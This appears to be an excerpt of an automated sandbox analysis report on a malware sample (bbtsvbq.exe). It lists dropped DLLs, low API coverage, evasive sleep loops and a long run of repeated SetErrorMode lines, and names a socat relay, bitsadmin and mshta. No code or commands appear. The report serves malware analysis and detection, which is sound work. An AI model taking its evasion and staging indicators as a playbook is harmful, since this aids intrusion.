Source: C:\ProgramData\7za.exe | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net35\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net452\es\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net35\it\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net35\fr\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net20\fr\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net40\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9kehql3e.dll
Source: C:\ProgramData\7za.exe | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net452\it\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net35\es\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net452\fr\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net35\de\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net20\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net40\es\Microsoft.Win32.TaskScheduler.resources.dll
Found large amount of non-executed APIs
Source: C:\ProgramData\7za.exe | API coverage: 8.0 %
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exe | API coverage: 1.4 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\bbtsvbq.exe TID: 3748 | Thread sleep time: -720000s >= -60s
Source: C:\Users\user\Desktop\bbtsvbq.exe TID: 3752 | Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3904 | Thread sleep time: -4611686018427385s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3908 | Thread sleep time: -500s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3908 | Thread sleep time: -12000s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3988 | Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3908 | Thread sleep time: -500s >= -60s
Source: C:\Windows\System32\bitsadmin.exe TID: 3968 | Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\taskeng.exe TID: 4000 | Thread sleep time: -100s >= -60s
Source: C:\Windows\System32\taskeng.exe TID: 4020 | Thread sleep time: -120000s >= -60s
Source: C:\Windows\System32\mshta.exe TID: 4072 | Thread sleep time: -120000s >= -60s
Source: C:\Windows\System32\mshta.exe TID: 2272 | Thread sleep time: -120000s >= -60s
Source: C:\Windows\System32\mshta.exe TID: 2512 | Thread sleep time: -120000s >= -60s
Source: C:\Windows\System32\mshta.exe TID: 2560 | Thread sleep time: -120000s >= -60s
Source: C:\Windows\System32\taskkill.exe TID: 2580 | Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\taskkill.exe TID: 2376 | Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\taskkill.exe TID: 2476 | Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2388 | Thread sleep time: -922337203685477s >= -60s

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\bbtsvbq.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
